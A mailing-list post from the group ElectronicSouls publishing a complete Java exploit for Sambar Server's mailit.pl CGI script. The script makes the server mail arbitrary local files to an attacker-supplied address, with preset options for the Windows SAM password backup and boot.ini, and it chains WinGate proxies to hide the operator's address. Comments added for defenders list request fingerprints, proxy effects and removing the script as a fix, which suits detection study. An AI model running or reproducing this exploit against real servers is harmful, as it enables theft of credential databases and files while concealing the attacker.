From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Sambar Exploit

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Here is an exploit for Sambar Server's mailit.pl, written in Java.  We
were taught Java by KF[0dd], the internet's premier exploit writing
genius, and technical support to most ADM/0dd exploits.

# cat  SambarMailit.java
/*---Written by Craig[TM]--- Electronicsouls-2001
 * This little java Exploit will use Sambar Servers' mailit.pl
 * to send any file to your eMail address.
 *
 * To use this, you need a...
 *
 * - mail relay
 * - secure eMail address (http://www.hushmail.com)
 * - java compiler and a Sambar Server<=4.2 with mailit.pl of course
 *
 * When using WinGates, separate them with "," like this:
 * Enter Wingate/s>127.0.0.1,192.168.0.10,192.168.0.1
 *
 * This exploit should leave NO logfiles - well, at least on my own server it did not!
 *
 *
 * BTW:I dunno if I may call this '0day' - somewhere on
 * a blackhead website i found a hint that there was an issue with
 * mailit.pl, so I figured it out...
 *
 *
 *  [Craig]
 *
 *  He...don't use this to deface...this is proof-of-concept code only!
 *
 * Last thing: BE PATIENT...THE EXPLOIT NEEDS SOME TIME TO RUN!
 *
 */

import java.io.*;
import java.net.*;
import java.util.*;

/**
 * Proof-of-concept console client from a security mailing-list post. It asks the
 * mailit.pl CGI script on a Sambar Server (the file header says versions &lt;= 4.2)
 * to e-mail a file from the server's own disk to an address the caller supplies.
 *
 * What the code itself shows: a single HTTP POST to /cgi-bin/mailit.pl whose form
 * body carries an SMTP relay ("server"), a recipient, and a server-side file path
 * ("attach"). All three values come straight from console input. The server-side
 * logic of mailit.pl is not on this page; presumably it acts on those fields
 * without restricting the attachment path or the relay.
 *
 * Reviewer notes for defenders:
 *  - Request fingerprint as emitted here: the fixed User-Agent string, body=Phile4U,
 *    from=hacked@[target host], subject=Sambar-File. These are literals and cheap to
 *    change; the durable indicator is a POST to mailit.pl with an "attach" field
 *    that names a local filesystem path.
 *  - The response is scanned for "MailIt Failed" / "MailIt Succeeded.", so those
 *    strings in outbound responses mark that the script ran.
 *  - With WinGate chaining enabled the TCP connection reaches the web server from
 *    the last proxy in the chain, so the logged source address is not the operator's.
 *  - The header's "leaves NO logfiles" remark is the author's observation on one
 *    server and is unverified. Outbound SMTP from the web-server host to an
 *    unfamiliar relay is a signal that does not depend on web access logs.
 *  - Removing mailit.pl from cgi-bin, or restricting who can reach it, closes this
 *    path irrespective of server version; whether a later Sambar release changed
 *    the script is not stated on this page.
 *
 * Structure: every field is static and shared between the instance methods and
 * main(). Several method names are German: Hole... = "get ...", Verbinde = "connect".
 */
public class SambarMailit
 {

        //line from server that is read in
        static String line="";

        //arrays for wingates
        //fixed capacity of 100 entries; unused slots stay null and act as the end marker
 static String Wingates[]=new String[100];

        //vars for the user input from console
        //SMTPServer = relay the script is told to use, Server = target web server,
        //File = server-side path placed in the "attach" field, eMail = recipient
        static String SMTPServer;
  static String Server;
  static String File;
        static String eMail;

        //the shit for the socket ;)
        //in = console reader; sin/sout = socket input/output, set by Verbinde()
        static DataInputStream in = new DataInputStream (System.in);
        static DataInputStream sin;
  static PrintStream sout;
  static Socket s=null;

        //some "switches" in the program
        //useWingates is set by HoleWingates(); Mode is the menu choice (1-4)
        static boolean useWingates=false;
  static int Mode;


 //the user menu
 //Prints the four options, reads one line from the console and stores the number
 //in Mode. Exits the JVM for option 4 or a number outside 1..4.
 //Only IOException is caught; a non-numeric line makes Integer.valueOf throw
 //NumberFormatException, which is not handled here.
 void HoleModus()
        {
   try
        {
                 System.out.println("What do you want?");
           //NOTE(review): on Windows NT/2000 the repair directory's sam._ is a backup
           //copy of the SAM account database, so a request naming it should be
           //treated as an attempt to obtain password hashes.
           System.out.println("(1) send me C:\\winnt\\repair\\sam._");
           System.out.println("(2) send me C:\\boot.ini");
           System.out.println("(3) send me a file I want");
           System.out.println("(4) quit");
           System.out.print(">");

                  //local reader shadows the static field "in"
                  DataInputStream in = new DataInputStream (System.in);
                  String raw=in.readLine();
                  Mode=Integer.valueOf(raw).intValue();
                  //Mode%1!=0 can never be true for an int; only the range test matters
                  if (Mode<1 || Mode>4 || Mode%1!=0)
                 {System.out.println("invalid option! quitting...");System.exit(0);}

                  if (Mode==4)System.exit(0);

                  System.out.print("\n");

                }//try
     catch (IOException e) {System.out.println("Error reading input from Console:"+e);}
        }//HoleModus






 //ask user for server
 //Reads one console line into Server; the value is used later as connect target,
 //Host header and as part of the "from" field. No validation is applied.
 void HoleServer()
        {
   try
        {
                  System.out.print("Enter Server>");

                  DataInputStream in = new DataInputStream (System.in);
                  Server=in.readLine();

                }//try
     catch (IOException e) {System.out.println("Error reading input from Console:"+e);}
        }//HoleServer




 //ask user for wingates - i would strongly suggest to use this!
 //Reads a comma-separated list of proxy hosts, trims each entry and stores them
 //in Wingates[] in input order. Sets useWingates when at least one entry exists.
 //An empty line yields zero tokens, so Wingates[0] stays null and the flag stays false.
 //There is no bounds check against the array's 100 slots.
 void HoleWingates()
        {
         try
        {
                  System.out.print("Enter Wingate/s>");

                  DataInputStream in = new DataInputStream (System.in);
                  String WingatesRaw=in.readLine();

                  StringTokenizer token = new StringTokenizer(WingatesRaw, ",");
      int num_tokens = token.countTokens();
            for (int i = 0;i< num_tokens;i++)
             {
                Wingates[i]=token.nextToken();
              Wingates[i]=Wingates[i].trim();
             }

                  //Wingates[0]!="" compares object references, not string contents
                  if (Wingates[0]!=null && Wingates[0]!="")useWingates=true;

                 //for (int i=0;Wingates[i]!=null;i++)System.out.println("Wingate["+i+"]:"+Wingates[i]);

                }//try
     catch (IOException e) {System.out.println("Error with your Wingates:"+e);}

  }//HoleWingates




 //ask user where to download and so on...
 //Reads the SMTP relay and the recipient address; for menu option 3 it also reads
 //the file path. Modes 1 and 2 get their fixed path assigned in main().
 void HoleOptions()
  {
   try
        {

         System.out.print("Mail relay>");
             //these two assignments replace the static console reader
             in = new DataInputStream (System.in);
             SMTPServer=in.readLine();

             System.out.print("My eMail>");
             in = new DataInputStream (System.in);
             eMail=in.readLine();


         if (Mode==3)
                  {
         System.out.print("File to send>");
               //local reader, shadows the static field inside this branch only
               DataInputStream in = new DataInputStream (System.in);
               File=in.readLine();
                        }


        }
        catch (IOException e){System.out.println("Error reading input from Console:"+e);}

        }//HoleOptions


 //connect to the server with or without WinGates
 //Opens the TCP connection and assigns s, sin and sout.
 //Proxy path: connects to the first list entry on port 23, then sends one
 //"<host> 23" line per further entry and finally "<Server> 80", echoing one reply
 //line after each step. Direct path: connects to Server on port 80.
 //NOTE(review): on the proxy path the web server sees the last hop's address, so
 //the source IP in its logs does not identify the operator.
 void Verbinde()
        {
         try
                {

           if (useWingates==true)
                        {
             s = new Socket(Wingates[0], 23);
             sin = new DataInputStream (s.getInputStream());
             sout = new PrintStream (s.getOutputStream());

                 //walk the remaining entries until the first null slot
                 for (int i=1;Wingates[i]!=null;i++)
              {
         System.out.println("Trying to connect to "+Wingates[i]+"...");
               sout.println(Wingates[i]+" 23");
         line=sin.readLine();
         System.out.println(line);
        }

             System.out.println("Now trying to connect to "+Server+":80...");
             sout.println(Server+" 80");
             System.out.println((line=sin.readLine()));
                        }

           else
                        {
             s = new Socket(Server, 80);
             sin = new DataInputStream (s.getInputStream());
             sout = new PrintStream (s.getOutputStream());
                        }

    }//try
   catch (IOException e){System.out.println("Error Connecting:"+e);}

        }//verbinde()





 //main program
 //Runs the four prompts in order, connects, writes one POST request to
 //mailit.pl and prints the response until a result marker or end of stream.
 public static void main(String[] args)
        {
         System.out.println("\nCraig's Sambar<=4.2 (0day?) mailit.pl Exploit");
         SambarMailit Sam=new SambarMailit();

         Sam.HoleModus();
         Sam.HoleServer();
         Sam.HoleWingates();
         Sam.HoleOptions();

  try
         {

     //menu options 1 and 2 map to fixed paths; option 3 already set File
     if (Mode==1)File="C:\\winnt\\repair\\sam._";
     if (Mode==2)File="C:\\boot.ini";

           Sam.Verbinde();

      //NOTE(review): request line and User-Agent are fixed literals, so they can
      //serve as a signature for this exact client, but not for modified copies.
      sout.println("POST /cgi-bin/mailit.pl HTTP/1.1");
      sout.println("Content-Type: application/x-www-form-urlencoded");
      sout.println("User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)");
      sout.println("Host: "+Server);

      //for the POST command, we need to know the exact length of data to send
      //72 is the combined length of the fixed literal text in the body line below;
      //the four values are counted at their raw length because none is URL-encoded
      int l=72+Server.length()+SMTPServer.length()+eMail.length()+File.length();

      sout.println("Content-Length: "+l);
      //the embedded "\n" plus println's own line end terminates the header block
      sout.println("Connection: Keep-Alive\n");
      //Form body. The inline block comment (wrapped across two lines by the mail
      //client) shows a percent-encoded form of the option-1 path; the code sends
      //the path un-encoded.
      //NOTE(review): detection that matches on the "attach" field should therefore
      //handle both raw and percent-encoded path forms.
        sout.println("server="+SMTPServer+"&recipient="+eMail+"&body=Phile4U&attach="+File/*C%3A%5Cwinnt%5Crepai
r%5Csam._*/+"&from=hacked@"+Server+"&subject=Sambar-File");

          System.out.println();

          //echo the response line by line; stop at end of stream or at the
          //first line containing one of mailit.pl's result strings
          while (true)
                 {

            line=sin.readLine();
            if (line==null)break;
            System.out.println(line);

            if (line.indexOf("MailIt Failed")>-1)
                {System.out.println("ERROR!\n\n");break;}
          if (line.indexOf("MailIt Succeeded.")>-1)
                {System.out.println("SUCCESS!\n\n");break;}

                 }


          //reached only on the normal path; an IOException above skips the close
          s.close();

   }//try
  catch (IOException e){System.out.println("Error!:"+e);}

        }//main

}//class

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Short Music For Short People."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nohoMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltZQIAoID2JahMWrfN
jLArXryWRpZJuKjVAKC+RHRdI7jWnflBbiJVMfmEB1SOOA==
=8b73
-----END PGP SIGNATURE-----



